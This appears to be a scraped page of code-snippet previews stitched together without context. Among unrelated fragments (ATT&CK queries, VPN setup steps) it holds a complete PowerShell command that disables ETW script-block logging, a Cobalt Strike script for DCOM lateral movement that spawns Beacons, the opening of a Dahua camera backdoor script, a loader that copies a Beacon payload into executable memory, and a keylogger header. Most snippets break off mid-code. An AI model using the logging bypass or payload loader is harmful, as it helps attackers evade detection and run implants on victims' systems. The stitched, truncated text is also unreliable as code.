| from stix2 import FileSystemSource | |
| from stix2 import Filter | |
| from stix2.utils import get_type_from_id | |
| fs = FileSystemSource('./enterprise-attack') | |
| def get_group_by_alias(src): | |
| return src.query([ | |
| Filter('type', '=', 'intrusion-set'), | |
| ]) |
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Management; | |
| namespace ComAbandonment | |
| { | |
| public class ComAbandonment | |
| { |
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
| # Lateral movement techniques based on research by enigma0x3 (Matt Nelson) | |
| # https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
| # https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ | |
| # Beacon implementation based on comexec.cna by Raphael Mudge | |
| # https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2 | |
| # Register alias | |
| beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", | |
| "Usage: dcom_shellexecute [target] [listener]\n\n" . | |
| "Spawn new Beacon on a target via DCOM ShellExecute Object."); |
| /* | |
| * CredentialUI.cs - Windows Credential UI Helper | |
| * | |
| * License: Public Domain | |
| * | |
| */ | |
| using System; | |
| using System.ComponentModel; | |
| using System.Runtime.InteropServices; | |
| using System.Security; |
| #!/usr/bin/python2.7 | |
| # | |
| # Dahua backdoor Generation 2 and 3 | |
| # Author: bashis <mcw noemail eu> March 2017 | |
| # | |
| # Credentials: No credentials needed (Anonymous) | |
| #Jacked from git history | |
| # | |
| import string |
| #include "stdafx.h" | |
| // Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread | |
| void spawnBeacon(char *payload, DWORD len) { | |
| HANDLE threadHandle; | |
| DWORD threadId = 0; | |
| char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| memcpy(alloc, payload, len); |
| q53PkBGCN3ulpR4sm5u4BO85HzEdVMPIJLBX3UZe5oc= |
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
Ubuntu 14.04.Secure Group Inbound Rules, add a SSH Rule(TCP, Port 22, 0.0.0.0/0) and a Custom TCP Rule(TCP, Port 1723, 0.0.0.0/0).sudo apt-get install pptpd.sudo vim /etc/pptpd.conf. Uncomment localip 192.168.0.1 and remoteip 192.168.0.234-238,192.168.0.245.sudo vim /etc/ppp/pptpd-options. Uncomment ms-dns and ms-wins. Change the IP to Google's DNS like this: